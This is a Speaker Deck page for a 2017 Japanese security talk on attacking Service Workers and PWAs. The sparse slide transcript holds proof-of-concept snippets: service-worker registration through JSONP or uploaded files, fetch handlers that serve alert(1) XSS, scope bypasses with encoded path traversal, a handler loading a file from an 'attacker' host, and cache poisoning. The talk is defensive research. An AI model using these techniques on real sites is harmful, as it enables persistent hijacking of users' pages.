Upgrade to Pro — share decks privately, control downloads, hide ads and more …

攻撃者視点で見る Service Worker / PWA Study SW

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for Masato Kinugawa Masato Kinugawa
September 14, 2017
Technology
20
27k

攻撃者視点で見る Service Worker / PWA Study SW

PWA Study( https://web-study.connpass.com/event/65267/ ) で発表した資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

September 14, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
710
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
2k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4.2k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.6k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
23k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
110k

Other Decks in Technology

See All in Technology
Databricksアシスタントが自分で考えて動く時代に! エージェントモード体験もくもく会
Avatar for Takaaki Yayoi taka_aki
0
320
Datadog Cloud Cost Management で実現するFinOps
Avatar for Taiji HAGINO taiponrock
PRO
0
140
Secure Boot 2026 - Aggiornamento dei certificati UEFI e piano di adozione in azienda
Avatar for Intune Italian User Group memiug
0
140
LINE Messengerの次世代ストレージ選定
Avatar for LINEヤフーTech (LY Corporation Tech) lycorptech_jp
PRO
19
7.3k
OpenClawで回す組織運営
Avatar for Kazuto Kusama jacopen
2
390
LY Tableauでの Tableau x AIの実践 (at Tableau Now! - 2026-02-26)
Avatar for Yoshitaka Arakawa yoshitakaarakawa
0
1.3k
Digitization部 紹介資料
Avatar for Sansan, Inc. sansan33
PRO
1
7k
生成AI活用によるPRレビュー改善の歩み
Avatar for LINEヤフーTech (LY Corporation Tech) lycorptech_jp
PRO
5
2k
Lookerの最新バージョンv26.2がやばい話
Avatar for Yuta Ozaki waiwai2111
1
150
オンプレとGoogle Cloudを安全に繋ぐための、セキュア通信の勘所
Avatar for Yuta Ozaki waiwai2111
3
1.1k
LINEアプリ開発のための Claude Code活用基盤の構築
Avatar for LINEヤフーTech (LY Corporation Tech) lycorptech_jp
PRO
2
1.4k
Data Hubグループ 紹介資料
Avatar for Sansan, Inc. sansan33
PRO
0
2.8k

Featured

See All Featured
The Curious Case for Waylosing
Avatar for Cassini Nazir cassininazir
0
260
Odyssey Design
Avatar for Ryan Kendrick rkendrick25
PRO
2
530
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
Avatar for Aleyda Solis aleyda
1
1.9k
Site-Speed That Sticks
Avatar for Harry Roberts csswizardry
13
1.1k
Lessons Learnt from Crawling 1000+ Websites
Avatar for Charles Meaden charlesmeaden
PRO
1
1.1k
Test your architecture with Archunit
Avatar for Yoan thirion
1
2.2k
No one is an island. Learnings from fostering a developers community.
Avatar for Antonio thoeni
21
3.6k
The Director’s Chair: Orchestrating AI for Truly Effective Learning
Avatar for Mike Taylor tmiket
1
120
GraphQLとの向き合い方2022年版
Avatar for Yosuke Kurami quramy
50
14k
Code Review Best Practice
Avatar for Trisha Gee trishagee
74
20k
Deep Space Network (abreviated)
Avatar for Tony Rice tonyrice
0
86
The AI Revolution Will Not Be Monopolized: How open-source beats economies of scale, even for LLMs
Avatar for Ines Montani inesmontani
PRO
3
3.1k

Transcript

  1. None
  2. None

  3. • •

  4. • • • <script> navigator.serviceWorker.register("/sw.js") </script>

  5. • • •

  6. • • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23

  7. None

  8. HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});

  9. <script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]

    onfetch=event=>console.log('fetch')//({});

  10. <script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw

    = "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>

  11. • •

  12. • • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':

    'text/html'}}; e.respondWith(new Response(body,init)); }

  13. • • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>

  14. • • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:

    "/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}

  15. HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]

  16. https://example.com/api/jsonp https://example.com/api%2Fjsonp

  17. ❝ ❞

  18. https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F

  19. None

  20. • • •

  21. onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •

  22. <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016

  23. ❝ ❞

  24. <script src="//example.com/socialbutton.js"></script>

  25. self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });

    }); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }

  26. • •

  27. onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)

    { if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };

  28. <script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};

    request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>

  29. <script> document.write(localStorage.getItem('name')); </script>

  30. • • •

  31. • • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"

  32. GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:

    no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6

  33. • •

  34. None
  35. None